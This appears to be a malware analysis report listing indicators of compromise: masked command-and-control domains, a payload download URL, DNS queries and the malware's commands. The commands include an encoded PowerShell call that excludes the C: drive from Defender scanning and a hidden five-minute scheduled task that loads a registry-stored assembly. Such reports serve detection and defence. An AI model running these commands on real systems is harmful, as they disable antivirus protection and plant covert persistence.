Technical Information
- <SYSTEM32>\tasks\f18
- 'ta###grdev.com':80
- 'microsoft.com':80
- 'ha###.mine.nu':7000
- http://ta###grdev.com/loader/uploads/Rtmebgux_Hhbtcphm.bmp
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK ta###grdev.com
- DNS ASK microsoft.com
- DNS ASK ha###.mine.nu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA= (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F18 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F18\).F18).E...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F18 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F18\).F18).E...